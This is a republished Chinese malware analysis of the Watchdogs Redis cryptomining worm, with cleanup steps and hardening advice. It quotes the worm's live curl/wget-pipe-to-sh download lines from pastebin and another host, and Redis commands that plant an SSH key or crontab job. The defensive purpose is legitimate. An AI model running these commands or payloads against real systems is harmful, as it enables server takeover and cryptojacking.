Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

2023-10-21 00:30

本文主要是介绍Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

背景
2月20日17时许,阿里云安全监测到一起大规模挖矿事件,判断为Watchdogs蠕虫导致,并在第一时间进行了应急处置。

该蠕虫短时间内即造成大量Linux主机沦陷,一方面是利用Redis未授权访问和弱密码这两种常见的配置问题进行传播,另一方面从known_hosts文件读取ip列表,用于登录信任该主机的其他主机。这两种传播手段都不是第一次用于蠕虫,但结合在一起爆发出巨大的威力。

然而Watchdogs并不是第一个造成这般影响的Redis蠕虫。截至目前,Redis配置问题已惨遭40余种蠕虫***和利用;此外,其他种类数据库的配置问题,也难保不在将来成为***的目标。

因此,本文在分析此次Watchdogs挖矿蠕虫、提供清理建议的同时,也分析了数据库蠕虫的发展趋势,并针对类似的大规模***事件的应急和预防给出建议。

Watchdogs 挖矿蠕虫简介
该蠕虫的感染路径如下图所示。

Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

蠕虫传播方式

***者首先扫描存在未授权访问或弱密码的Redis,并控制相应主机去请求以下地址:

https://pastebin.com/raw/sByq0rym
该地址包含的命令是请求、base64解码并执行另一个url地址的内容:

(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
而https://pastebin.com/raw/D8E71JBJ 的内容解码后为一个bash脚本,脚本中又包含下载恶意程序Watchdogs的指令。

(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
如上图所示,本次蠕虫的横向传播分为两块。

一是Bash脚本包含的如下内容,会直接读取主机上的/root/.ssh/known_hosts和/root/.ssh/id_rsa.pub文件,用于登录信任当前主机的机器,并控制这些机器执行恶意指令。

Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

二是Bash脚本下载的Watchdogs程序,通过对Redis的未授权访问和爆破、以及对SSH的爆破,进行横向传播。

具体为表现为,Watchdogs程序的Bbgo()函数中,首先获取要***的ip列表
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

随后尝试登录其他主机的ssh服务,一旦登录成功则执行恶意脚本下载命令
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

在Ago()函数中,则表现为针对其他主机Redis的扫描和***。
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

恶意Bash脚本

除了下载Watchdogs程序和横向传播外,Bash脚本还具有以下几项功能

1.将下载自身的指令添加到crontab定时任务,10分钟执行一次
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

2.杀死同类的挖矿僵尸***进程
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

杀死cpu占用大于80%的其他进程
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

简而言之,bash脚本主要是完成恶意程序植入、持久化和一部分的横向传播功能。

Watchdogs分析

Watchdogs程序为elf可执行文件,由go语言编译,其主要函数结构如下图所示。

Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

1.LibiosetWrite()

该函数主要执行libioset.so文件的写入
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

2.Cron()
将恶意下载命令添加到/etc/cron.d/root等多个文件中,定时执行,加大清理难度
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

3.KsoftirqdsWriteRun()
解压并写入挖矿程序及其配置文件
_

Bbgo()和Ago()函数的功能在“蠕虫传播方式”一节已有介绍,此处不再赘述。

综上,Watchdogs程序在Bash脚本执行的基础上,将进一步进行挖矿程序的释放和执行、恶意so文件写入以及剩余的横向传播。

libioset.so分析

如图是libioset.so的导出函数表,包括unlink, rmdir, readdir等。
readdir

这里以执行rm命令必须调用的unlink()函数为例。

它只对不包含"ksoftirqds"、"ld.so.preload"、"libioset.so"这几个字符串的文件调用正常的unlink(),导致几个文件无法被正常删除。
_

其他几个命令,如readdir也是类似,无法正常返回关于恶意程序的结果。

而fopen函数更是变本加厉,由于系统查询cpu使用情况和端口占用情况时,都会调用fopen,于是***者hook了这一函数,使其在读取'/proc/stat'和'/proc/net/tcp'等文件时,调用伪造函数

_

其中forge_proc_cpu()函数,将返回硬编码的字符串

_

这种对查看系统状态功能的恶意hook,导致用户难以通过简单自查,确定挖矿是否存在以及挖矿进程是哪个。

“许多***模仿我的代码”——数据库蠕虫趋势统计
此次的Watchdogs挖矿蠕虫与18年出现的kworkerd蠕虫出自同一位作者(关于kworkerd挖矿僵尸网络参见《2018年云上挖矿分析报告》),因为它们使用了相同的钱包地址和相似的***手法。此外作者在恶意脚本末尾的注释也印证了这点:

#1.If you crack my program, please don't reveal too much code online.Many hacker boys have copied my kworkerds code,more systems are being attacked.(Especially libioset)...
这段注释同时也揭露了一个事实,“许多***模仿我的代码”——当一个***者采取了某种***手法并取得成功,其他***者会纷纷模仿,很快将该手段加入自己的“***大礼包”。

这种模仿的结果是,据阿里云安全不完全统计,利用Redis未授权访问等问题进行***的蠕虫,数量已从2018年中的一个,上涨到如今的40余个,其中不乏DDG、8220这样臭名昭著的挖矿团伙。此外大部分近期新出现的蠕虫,都会加上Redis利用模块,因为实践证明互联网上错误配置的Redis数据库数量庞大,能从其中分一杯羹,***者的盈利就能有很大的提升。

因而如果不保护好Redis,用户面临的将不是一个蠕虫,而是40余个蠕虫此起彼伏的***。

下图所示为近半年来,针对Redis的***流量和目标机器数量趋势,从中不难看出Redis***逐渐被各大僵尸网络采用,并在2018年10月11月保持非常高的***量;而后在经历了3个月左右的沉寂期后,在今年2月再次爆发。

_

而Redis本身遭受***的主流方法也经过了三个阶段

1.***者对存在未授权访问的Redis服务器写入ssh key,从而可以畅通无阻登录ssh服务

具体为执行以下payload

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 【sshkey】 root@kali\n\n\n"
save
其中【sshkey】表示***者的密钥

2.***者对存在未授权访问的Redis服务器写入crontab文件,定时执行恶意操作

具体为执行以下payload

config set dir /var/spool/cron
config set dbfilename root
set x "【evil command】"
save
其中【evil command】表示定时执行的恶意命令

3.以上两个阶段中仅对Redis完全没有验证即可访问的情况,第三个阶段则开始针对设置了密码验证,但密码较弱的Redis进行***,受害范围进一步扩大。

然而Redis并不是唯一一个受到***“青眼”的数据库。如下表所示,SQL Server, Mysql, Mongodb这些常用数据库的安全问题,也被多个挖矿僵尸网络所利用;利用方式集中在未授权访问、密码爆破和漏洞利用。

Watchdogs***修复及清理方法
1.首先停止cron服务,避免因其不断执行而导致恶意文件反复下载执行。

如果操作系统可以使用service命令,则执行

service crond stop

如果没有service命令,执行

/etc/init.d/cron stop

2.随后使用busybox删除以下两个so文件:

sudo busybox rm -f /etc/ld.so.preload
sudo busybox rm -f /usr/local/lib/libioset.so
sudo ldconfig
busybox是一个小巧的unix工具集,许多Linux系统装机时已集成。使用它进行删除是因为系统自带的rm命令需要进行动态so库调用,而so库被恶意hook了,无法进行正常删除;而busybox的rm是静态编译的,无需调用so文件,所以不受影响。

3.清理恶意进程

sudo kill -9 ps -ef|grep Watchdogs|grep -v grep |awk '{print $2}'
sudo kill -9 ps -ef|grep ksoftirqds|grep -v grep |awk '{print $2}'
4.清理cron相关文件,重启服务,具体为检查以下文件并清除其中的恶意指令:

/var/spool/cron/crontabs/root
/var/spool/cron/root
/etc/cron.d/root
之后执行

service crond start

/etc/init.d/cron start
安全建议
数字加密货币的获取依赖计算资源的特质,催生了***进行大规模***的动机和土壤;类似Watchdogs蠕虫这样的数据库***事件,不是第一起,也不会是最后一起。阿里云作为“编写时即考虑安全性”的平台,提供良好的安全基础设施和丰富的安全产品,帮助用户抵御挖矿和***,同时提供以下安全建议:

1.在***发生之前,加强数据库服务的密码,尽量不将数据库服务开放在互联网上,或根据实际情况进行访问控制(ACL)。这些措施能够帮助有效预防挖矿、勒索等***。平时还要注意备份资料,重视安全产品告警。

2.如果怀疑主机已被***挖矿,对于自身懂安全的用户,在***者手段较简单的情况下,可以通过自查cpu使用情况、运行进程、定时任务等方式,锁定***源头。

3.对于***者采用较多隐藏手段的***(如本次的Watchdogs蠕虫,使ps、top等系统命令失效),建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御***。哪怕***者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断***链。此外,用户还可以通过自定义策略,直接屏蔽pastebin.com、thrysi.com等广泛被挖矿蠕虫利用的网站,达到阻断***的目的。

Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?
如图是云防火墙帮助用户拦截此次Watchdogs蠕虫下载的例子,图中共拦截23次对pastebin.com的请求;这些拦截导致主机未下载恶意脚本,从而就不会发起对thrysi.com的请求,故规则命中次数为0。

以上截图表明Watchdogs的***链未能执行到下一步,拦截起到了很好的效果。

4.对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防***。***事件发生后,也可介入直接协助***后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。

IOC
钱包地址
46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava

矿池地址
xmr.f2pool.com

恶意url
pastebin.com/raw/sByq0rym

thyrsi.com/t6/672/1550667515x1822611209.jpg

恶意文件
Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?

转载于:https://blog.51cto.com/14031893/2362555

这篇关于Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/250687

相关文章

Spring Security基于数据库验证流程详解

Spring Security 校验流程图 相关解释说明(认真看哦) AbstractAuthenticationProcessingFilter 抽象类 /*** 调用 #requiresAuthentication(HttpServletRequest, HttpServletResponse) 决定是否需要进行验证操作。* 如果需要验证,则会调用 #attemptAuthentica

MySQL数据库宕机,启动不起来,教你一招搞定!

作者介绍:老苏,10余年DBA工作运维经验,擅长Oracle、MySQL、PG、Mongodb数据库运维(如安装迁移,性能优化、故障应急处理等)公众号:老苏畅谈运维欢迎关注本人公众号,更多精彩与您分享。 MySQL数据库宕机,数据页损坏问题,启动不起来,该如何排查和解决,本文将为你说明具体的排查过程。 查看MySQL error日志 查看 MySQL error日志,排查哪个表(表空间

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

深入理解数据库的 4NF:多值依赖与消除数据异常

在数据库设计中, "范式" 是一个常常被提到的重要概念。许多初学者在学习数据库设计时,经常听到第一范式(1NF)、第二范式(2NF)、第三范式(3NF)以及 BCNF(Boyce-Codd范式)。这些范式都旨在通过消除数据冗余和异常来优化数据库结构。然而,当我们谈到 4NF(第四范式)时,事情变得更加复杂。本文将带你深入了解 多值依赖 和 4NF,帮助你在数据库设计中消除更高级别的异常。 什么是

DM8数据库安装后配置

1 前言 在上篇文章中,我们已经成功将库装好。在安装完成后,为了能够更好地满足应用需求和保障系统的安全稳定运行,通常需要进行一些基本的配置。下面是一些常见的配置项: 数据库服务注册:默认包含14个功能模块,将这些模块注册成服务后,可以更好的启动和管理这些功能;基本的实例参数配置:契合应用场景和发挥系统的最大性能;备份:有备无患;… 2 注册实例服务 注册了实例服务后,可以使用系统服务管理,

速了解MySQL 数据库不同存储引擎

快速了解MySQL 数据库不同存储引擎 MySQL 提供了多种存储引擎,每种存储引擎都有其特定的特性和适用场景。了解这些存储引擎的特性,有助于在设计数据库时做出合理的选择。以下是 MySQL 中几种常用存储引擎的详细介绍。 1. InnoDB 特点: 事务支持:InnoDB 是一个支持 ACID(原子性、一致性、隔离性、持久性)事务的存储引擎。行级锁:使用行级锁来提高并发性,减少锁竞争

开源分布式数据库中间件

转自:https://www.csdn.net/article/2015-07-16/2825228 MyCat:开源分布式数据库中间件 为什么需要MyCat? 虽然云计算时代,传统数据库存在着先天性的弊端,但是NoSQL数据库又无法将其替代。如果传统数据易于扩展,可切分,就可以避免单机(单库)的性能缺陷。 MyCat的目标就是:低成本地将现有的单机数据库和应用平滑迁移到“云”端

ORACLE 11g 创建数据库时 Enterprise Manager配置失败的解决办法 无法打开OEM的解决办法

在win7 64位系统下安装oracle11g,在使用Database configuration Assistant创建数据库时,在创建到85%的时候报错,错误如下: 解决办法: 在listener.ora中增加对BlueAeri-PC或ip地址的侦听,具体步骤如下: 1.启动Net Manager,在“监听程序”--Listener下添加一个地址,主机名写计

MyBatis 切换不同的类型数据库方案

下属案例例当前结合SpringBoot 配置进行讲解。 背景: 实现一个工程里面在部署阶段支持切换不同类型数据库支持。 方案一 数据源配置 关键代码(是什么数据库,该怎么配就怎么配) spring:datasource:name: test# 使用druid数据源type: com.alibaba.druid.pool.DruidDataSource# @需要修改 数据库连接及驱动u

JVM 常见异常及内存诊断

栈内存溢出 栈内存大小设置:-Xss size 默认除了window以外的所有操作系统默认情况大小为 1MB,window 的默认大小依赖于虚拟机内存。 栈帧过多导致栈内存溢出 下述示例代码,由于递归深度没有限制且没有设置出口,每次方法的调用都会产生一个栈帧导致了创建的栈帧过多,而导致内存溢出(StackOverflowError)。 示例代码: 运行结果: 栈帧过大导致栈内存